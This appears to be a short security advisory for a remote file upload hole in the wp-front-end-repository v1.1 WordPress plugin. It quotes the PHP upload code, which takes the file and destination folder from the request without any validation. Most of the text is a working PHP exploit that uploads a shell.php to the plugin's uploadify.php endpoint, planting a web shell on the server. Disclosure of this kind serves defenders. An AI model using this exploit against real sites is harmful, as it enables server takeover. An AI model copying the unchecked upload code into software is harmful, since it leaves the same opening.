Title:Remote file upload vulnerability in wp-front-end-repository v1.1 Wordpress plugin [Previously Discovered]
Lines 26-41 do not do any checking of any sort allowing arbitrary users to upload malicious executable scripts.

 26 if (!empty($_FILES)) {
 27         $tempFile = $_FILES['Filedata']['tmp_name'];
 28         $targetPath = $_REQUEST['folder'];
 29         $targetFile =  str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
.
.
.
 40                 move_uploaded_file($tempFile,$targetFile);
 41                 echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);
<?php
/*
Exploit for wp-front-end-repository remote shell upload.
Larry W. Cashdollar, @_larry0
7/11/2015
*/

$uploadfile="/var/www/shell.php";
$ch =
curl_init("http://www.vapidlabs.com/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,         array('Filedata'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'shell.php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>